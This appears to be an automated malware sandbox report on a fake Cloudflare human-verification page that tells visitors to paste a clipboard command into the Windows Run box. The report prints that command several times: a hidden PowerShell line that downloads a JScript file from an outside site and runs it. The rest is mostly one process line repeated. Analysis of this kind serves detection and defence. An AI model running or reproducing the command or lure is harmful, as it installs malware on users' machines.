                    Source: screenshotOCR Text: -8 x about:blank x Trailblazing a better future for X elevate. inc/our-story e elevate.inc Verify you are human by completing the action below. Verification Steps Terre; ara Car.:iitions To better prove you are not a robot, please: 1. Press & hold the Windows Key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree: Cloudflare verification (Ray ID: c7d266e1222bf2e) Perform the steps above to finish Verify verificatiom Ray 10: c7d286e1222bf2e Platform performance and security Cloudflare 16:19 ENG p Type here to search SG 06/06/2025
                    Source: screenshotOCR Text: -8 x about:blank x Trailblazing a better future for X elevate. inc/our-story e elevate.inc Verify you are human by completing the action below. c Verification Steps Terre; ara Car.:iitions To better prove you are not a robot, please: 1. Press & hold the Windows Key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree: Cloudflare verification (Ray ID: c7d266e1222bf2e) Perform the steps above to finish Verify verificatiom Ray 10: c7d286e1222bf2e Platform performance and security Cloudflare 16:19 ENG p Type here to search SG 06/06/2025
                    HTML page adds supicious text to clipboard
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: powershell -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}"
                    Tries to download and execute files (via powershell)
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
